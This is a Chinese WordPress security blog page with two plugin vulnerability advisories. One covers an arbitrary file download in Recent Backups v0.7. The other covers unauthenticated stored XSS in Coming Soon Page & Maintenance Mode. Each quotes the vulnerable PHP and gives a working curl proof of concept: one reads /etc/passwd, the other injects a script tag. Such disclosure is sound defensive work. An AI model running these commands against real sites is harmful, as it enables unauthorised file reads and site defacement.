Category Archives: WP安全防范

Recent Backups – v0.7,有漏洞可让别人随意下载文件

Category : WP安全防范

当前状态,该 插件已在官网下架,不能安装使用。

发现日期:2015-07-13
WP官网下载网址:https://wordpress.org/plugins/recent-backups
软件发行商:https://profiles.wordpress.org/andycheeseman/

漏洞:
download-file.php中的代码没有任何必要的安全检查,没有验证用户是否登录,也没有过滤掉不可下载的文件。此漏洞能被利用来下载敏感的系统密码文件:

     2  $file = $_GET['file_link'];
     3  
     4  if (file_exists($file)) {
     5      header('Content-Description: File Transfer');
     6      header('Content-Type: application/octet-stream');
     7      header('Content-Disposition: attachment; filename='.basename($file));
     8      header('Content-Transfer-Encoding: binary');
     9      header('Expires: 0');
    10      header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    11      header('Pragma: public');
    12      header('Content-Length: ' . filesize($file));
    13      ob_clean();
    14      flush();
    15      readfile($file);

漏洞验证

$ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd

Coming Soon Page & Maintenance Mode 插件存在有XSS漏洞,容易被攻击者注入js

Category : WP安全防范

发现时间:该漏洞已被发现并于2019年7月5日报告给wordpress.org团队。

WordPress 插件【Coming Soon Page & Maintenance Mode】,有7,000多个活跃的安装,被发现存在有XSS漏洞,使未经身份验证的攻击者可以将JavaScript或HTML代码注入博客前端。

未经验证第三方JS内容注入

在主脚本“ response-coming-soon.php”第51行中,无论何时访问博客(前端或后端),插件都会加载“ data-save-post.php”脚本:

require_once('functions/data-save-post.php');

如下的PHP代码用来保存插件的配置:

<?php 
if(isset($_POST['action_rcs']) == "action_rcs_page_setting_save_post")
{

   $hook = $_POST['hook'];
   $hook = 'wpsm_rcs_plugin_options_'.$hook;
   print_r($_POST);
   update_option($hook, serialize($_POST));
}
?>

以上代码没有做任何检查来确保只有管理员可以访问该页面,没有安全随机数可以防止CSRF,也没有检查用户的POST数据是否合法。用户的任何输入将被直接输出到’templates / template1 / index.php’ ,例如:

<p><?php echo $wpsm_rcs_plugin_options_general['rcsp_description']; ?></p>

受影响的变量有 logo_width,logo_height,rcsp_logo_url,home_sec_link_txt,rcsp_headlinercsp_description,它们都可以用于将HTML和JavaScript代码注入博客的前端:

验证漏洞是否存在

$ curl 'http://example.org/?page=wpsm_responsive_coming_soon' --data 'action_rcs=action_rcs_page_setting_save_postl&hook=general&rcsp_headline=<script>alert("Stored XSS")</script>&logo_enable=off&rcsp_description=FOO&home_sec_link_txt=FOO'

建议

如果已安装该插件的1.7.8或更低版本,请尽快更新。

分类目录

页面

© 2019 Cancms